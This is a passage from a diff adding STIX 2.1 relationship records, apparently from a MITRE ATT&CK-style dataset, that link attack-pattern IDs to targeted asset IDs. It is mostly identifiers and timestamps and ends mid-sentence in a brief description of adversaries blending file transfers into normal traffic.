"created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.755Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a8a717af-2be9-4fb9-8c4e-8192992d2cfd", + "created": "2024-07-02T13:55:55.752Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.752Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a8ad0449-8f2c-46dd-8dbb-76f89fcc646f", + "created": "2024-06-21T14:12:20.260Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.260Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--830c9528-df21-472c-8c14-a036bf17d665", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a8ad0df4-eb1b-4faa-bf47-9443edeb9028", + "created": "2024-06-21T14:12:20.270Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.270Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a8af24a3-343b-4003-8c13-eb5d642026d2", + "created": "2024-07-02T13:55:55.763Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.763Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1644e709-12d2-41e5-a60f-3470991f5011", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a8ffa657-3a3c-41fd-9b02-31ec048f05d6", + "created": "2024-06-26T14:52:32.950Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T14:52:32.950Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f8ef3a62-3f44-40a4-abca-761ab235c436", + "target_ref": "x-mitre-asset--65c04f96-37e5-4358-ab16-087e240c1b6e", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a91295dc-b381-4dc9-9384-9f9949066778", + "created": "2023-09-29T18:42:18.446Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T18:42:18.446Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--9a505987-ab05-4f46-a9a6-6441442eec3b", + "target_ref": "x-mitre-asset--f1315d02-9118-4e3b-8cdf-4c2d3f77ce41", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a93ba793-24dd-47dd-b32c-4c3016124c90", + "created": "2023-09-29T18:43:02.969Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T18:43:02.969Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d67adac8-e3b9-44f9-9e6d-6c2a7d69dbe4", + "target_ref": "x-mitre-asset--f1315d02-9118-4e3b-8cdf-4c2d3f77ce41", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a9400989-2867-41de-aa5c-d73dffe0ec46", + "created": "2024-07-02T13:55:55.757Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.757Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--fdc47f44-dd32-4b99-af5f-209f556f63c2", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a957f520-99e8-42c6-80e0-2b5f1bbb80bd", + "created": "2024-06-26T13:48:33.087Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T13:48:33.087Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e49920b0-6c54-40c1-9571-73723653205f", + "target_ref": "x-mitre-asset--2821ca87-8f61-47e5-a3bf-524f65573d77", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a973e398-3da4-4e53-a465-110a0128807d", + "created": "2024-07-02T13:55:55.757Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.757Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a9933ba1-7091-4605-b432-dd2a78218d3d", + "created": "2024-06-21T14:12:20.273Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.273Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a542bac9-7bc1-4da7-9a09-96f69e23cc21", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a9ad8c47-9cec-45c1-8d07-6154d2cc752b", + "created": "2020-02-11T18:46:24.525Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--3120b9fa-23b8-4500-ae73-09494f607b7d", + "target_ref": "attack-pattern--0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a9f01c1f-9da1-460f-beef-9eb10e307463", + "created": "2024-07-02T13:55:55.750Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.750Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--bb5e59c4-abe7-40c7-8196-e373cb1e5974", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--aa074c7f-ade4-477b-b2ad-8be03f793485", + "created": "2024-07-02T13:55:55.769Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.769Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--59ff91cd-1430-4075-8563-e6f15f4f9ff5", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--aa256b5f-d2e2-4470-a9bb-fbfc4acd5c22", + "created": "2024-07-02T13:55:55.755Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.755Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--9db0cf3a-a3c9-4012-8268-123b9db6fd82", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--aa34602a-7bd8-44ab-a4c8-2fc6620c2b7f", + "created": "2024-06-26T15:29:11.243Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T15:29:11.243Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e01be9c5-e763-4caf-aeb7-000b416aef67", + "target_ref": "x-mitre-asset--8a455821-6e6e-49b0-9b6d-ac01011263c1", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--aa427c3f-fa71-4fe6-a68c-d752dc21fd82", + "created": "2024-07-02T13:55:55.758Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.758Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--aa51802f-769d-40d4-9c78-d98a7a7eaaac", + "created": "2024-07-02T13:55:55.770Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.770Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--866d0d6d-02c6-42bd-aa2f-02907fdc0969", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--aa54c806-aaba-4fc7-975b-12fb4662d924", + "created": "2024-06-21T14:12:20.256Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.256Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1ecfdab8-7d59-4c98-95d4-dc41970f57fc", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--aa581aa5-e5ca-4ddf-9821-3646d94a12f5", + "created": "2024-06-21T14:12:20.264Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.264Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--fe926152-f431-4baf-956c-4ad3cb0bf23b", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--aa65e566-b5a7-4ecb-a50c-be07c0596bbc", + "created": "2024-07-02T13:55:55.771Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.771Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b21c3b2d-02e6-45b1-980b-e69051040839", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--aa679666-25ed-480d-b657-d4f1b5af2e5d", + "created": "2024-07-02T13:55:55.748Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.748Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--208884f1-7b83-4473-ac22-4e1cf6c41471", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--aa7a0f45-e027-4d79-8413-5d807f44c1ba", + "created": "2023-09-29T17:42:56.284Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T17:42:56.284Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2fedbe69-581f-447d-8a78-32ee7db939a9", + "target_ref": "x-mitre-asset--68388d4f-8138-420b-be2b-5a7dfe9ff6b4", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--aaa3e625-75c5-46d1-b587-3c667972fc4a", + "created": "2024-06-24T19:01:00.685Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-24T19:01:00.685Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b17a1a56-e99c-403c-8948-561df0cffe81", + "target_ref": "x-mitre-asset--2821ca87-8f61-47e5-a3bf-524f65573d77", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--aaad7647-81cf-4727-8fb9-23cfa6e7b7f2", + "created": "2024-07-02T13:55:55.765Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.765Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--5b0ad6f8-6a16-4966-a4ef-d09ea6e2a9f5", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--aad95bdf-5985-4ae4-8cc5-628c64c8d450", + "created": "2024-07-02T13:55:55.748Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.748Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1365fe3b-0f50-455d-b4da-266ce31c23b0", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--aaed8f25-b2fa-4ae9-ba36-ac3685ec0fa0", + "created": "2024-06-21T14:12:20.256Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.256Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--29be378d-262d-4e99-b00d-852d573628e6", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--aaf0f976-ec41-4b55-9bd2-21d73d8db31a", + "created": "2024-06-21T14:12:20.272Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.272Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--84e02621-8fdf-470f-bd58-993bb6a89d91", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ab05e641-ad44-471f-aab9-97e025bc6a6b", + "created": "2024-07-02T13:55:55.764Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.764Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--544b0346-29ad-41e1-a808-501bb4193f47", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ab152812-8954-4f79-a8f3-5a138f647dc5", + "created": "2024-07-02T13:55:55.760Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.760Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--861b8fd2-57f3-4ee1-ab5d-c19c3b8c7a4a", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ab280771-fa9b-4874-8248-343f7b66f85a", + "created": "2024-05-22T17:22:51.763Z", + "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-05-28T03:00:42.223Z", + "description": "Asset Mapping Rationale: ", + "relationship_type": "targets", + "source_ref": "attack-pattern--bb5a00de-e086-4859-a231-fa793f6797e2", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ab3453a9-562e-423c-9285-97aac1215d20", + "created": "2024-07-02T13:55:55.754Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.754Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--51ea26b1-ff1e-4faa-b1a0-1114cd298c87", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ab5c9a38-3140-43b6-bcf4-6197a116cd0b", + "created": "2023-09-29T17:37:50.048Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T17:37:50.048Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1c478716-71d9-46a4-9a53-fa5d576adb60", + "target_ref": "x-mitre-asset--68388d4f-8138-420b-be2b-5a7dfe9ff6b4", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ab728ef0-274f-4256-ac4f-3708bec19710", + "created": "2024-06-21T14:12:20.255Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.255Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ab844cd2-0f56-44f9-9838-cd5f04d75f3e", + "created": "2023-09-29T17:37:16.719Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T17:37:16.719Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--9a505987-ab05-4f46-a9a6-6441442eec3b", + "target_ref": "x-mitre-asset--68388d4f-8138-420b-be2b-5a7dfe9ff6b4", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ab87b619-0c0f-43dc-a728-09ecdb451278", + "created": "2024-07-02T13:55:55.757Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.757Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ffbcfdb0-de22-4106-9ed3-fc23c8a01407", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ab8bf0a3-0eef-4364-a3f9-f6ab6222afed", + "created": "2023-09-28T19:41:30.623Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T19:41:30.623Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8d2f3bab-507c-4424-b58b-edc977bd215c", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--aba6e5b5-7fa2-4dab-af55-7cc4f20e0105", + "created": "2024-05-23T03:51:34.219Z", + "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-05-28T03:02:17.826Z", + "description": "Asset Mapping Rationale: Adversaries may communicate using application layer protocols associated with transferring files to avoid detection/network filtering by blending in with existing traffic. An adversary may abuse 